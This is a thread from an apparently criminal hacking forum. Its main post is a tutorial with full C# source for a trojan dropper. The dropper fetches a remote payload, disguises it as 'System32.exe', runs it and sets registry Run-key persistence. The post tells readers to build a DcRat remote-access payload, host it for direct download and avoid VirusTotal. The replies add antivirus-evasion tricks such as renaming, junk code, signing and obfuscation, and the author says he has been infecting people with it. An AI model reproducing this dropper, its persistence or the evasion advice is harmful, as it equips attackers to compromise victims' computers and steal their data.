• XSS.stack #1 – первый литературный журнал от юзеров форума

Create a FUD Trojan that Never dies

Отслеживать

qGodless

(L2) cache
Пользователь
Регистрация
10.07.2022
Сообщения
385
Реакции
106
A Trojan is a program that appears to be legit but actually contains code that allows You to execute fully undetected stealer, ransomware, and more. on the victim
In this Article, you will learn how to create a Trojan that can go undetected and display whatever you want. && Never dies

I coded it using C#, You will need some basic knowledge of programming to follow along. If you don't Just ask in the comments

Over View of the code:

Step 1: The trojan will set itself in the Startup
Step 2: Every time the PC Starts, it checks if the malware is running:

If the malware is running = Do nothing
If the malware has been removed by WD/AV, The trojan will download a new one

How to setup:

Step 1) Download Visual Studio --> Here --> Visual Studio Community Edition
Step 2) Start the installation
Step 3) Choose the software version --> Visual Studio Community Edition

1661436168684.png

Istalling C#

1661436181422.png


Create a Project

1661436283116.png


Search for Console App (.Net

1661436383805.png

Step 1: Paste the code

Код: 
using System.IO;
using System.Net;
using System.Diagnostics;
using Microsoft.Win32;
using System.Threading;
using System.Windows.Forms;

namespace qTrojan
{
    class qTrojan
    {
        static void Main(string[] args)
        {
            string malwareURL = "https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe";       // Change it to your URL        |Change|
            int age = 4;                                                                           // Sleep time = 4               |Change|
            string trojaName = "System32.exe";                                                     // Startup name for the loader  |Don't change|
            Process[] ldrPrc = Process.GetProcessesByName(trojaName);                              // Startup name for the loader  |Don't change|
            Process[] malPrc = Process.GetProcessesByName("System64.exe");                         // Startup name for the Malware |Don't change|

            if (malPrc.Length == 0)                                                                // Check if malware was removed by WD
            { if (Directory.Exists("C:\\Users\\Public\\System32"))                                 // Check if malware folder was removed by WD
                { Thread.Sleep(age);
                    using (var client = new WebClient())
                    client.DownloadFile(malwareURL, "C:\\Users\\Public\\System32\\" + trojaName);  // If Malware exist just download start & set Startup
                    Thread.Sleep(age);
                    Process.Start("C:\\Users\\Public\\System32\\" + trojaName);
                    RegistryKey key = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); key.SetValue(trojaName, Application.ExecutablePath);
                }
                else                                                                               // If folder = removed -- Create folder, download, start, startup
                {var newPath = ("C:\\Users\\Public\\System32"); Directory.CreateDirectory(newPath);
                    using (var client = new WebClient()){
                        Thread.Sleep(age);
                        client.DownloadFile(malwareURL, "C:\\Users\\Public\\System32\\" + trojaName);
                        Thread.Sleep(age);
                        Process.Start("C:\\Users\\Public\\System32\\" + trojaName);
                        RegistryKey key = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); key.SetValue(trojaName, Application.ExecutablePath);}
                }
            }
        }
    }
}

Step 2: Generate a payload with any builder (DcRat is Good) And set the installation name to System64.exe

1661435552517.png


Step 3: Just Upload your malware to any site that supports Direct link download (Comment if you want a suggestion) And set it as malwareURL
1661435725500.png


Step 4: Build your Trojan

1661437993057.png


1661438518661.png



BE SURE TO FACE PROBLEMS AS A BEGGINER, IF YOU NEED ANY HELP JUST COMMENT
Don't submit to VirusTotal
 

Вложения

  • 1661436222713.png
    1661436222713.png
    44.6 КБ · Просмотры: 30
Пожалуйста, обратите внимание, что пользователь заблокирован
кто шарит подскажите свои мысли, рабочая вещь или х#йня ?
 
про FUD Trojan that Never dies ты ошибаешься конечно, да и в рантайме такое врядли даже wd пропустит, но за старания лайк поставлю
saidbek сказал(а):
кто шарит подскажите свои мысли, рабочая вещь или х#йня ?
скантайм вероятнее всего реально FUD, но сам метод скачки\помещения файла в сис директорию\метод автозагрузки 100% детектируется в рантайме
 
humm windows defender detects easilyzzzzz but but but, we can change signatures change variable names remove comments add junk functions / classes variables and imports , rename file to random string, sign file with cert and add rare logo andddd then windows Defender be like: huh no viruzz found :)
and btw i used crypto obfuscator at the end and it worked )
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Нужно еще сюда елочек и новогоднего настроения, чтобы рантайм был чистый, без этого никак.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
saidbek, l33t, V1rtualGh0st. Guys please, If I never worked with this I would never share it here. It's been over 2 months working with this simple code. And infecting people with WD On, and Someone said the persistence feature wont work.
I can give a sample and try for your self With your WD on and remove anything related to the malware, Restart your pc and see if it's back again

This shit is the only thing I have and when I share it. I get this kind of reviews. It's disappointing 😓
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх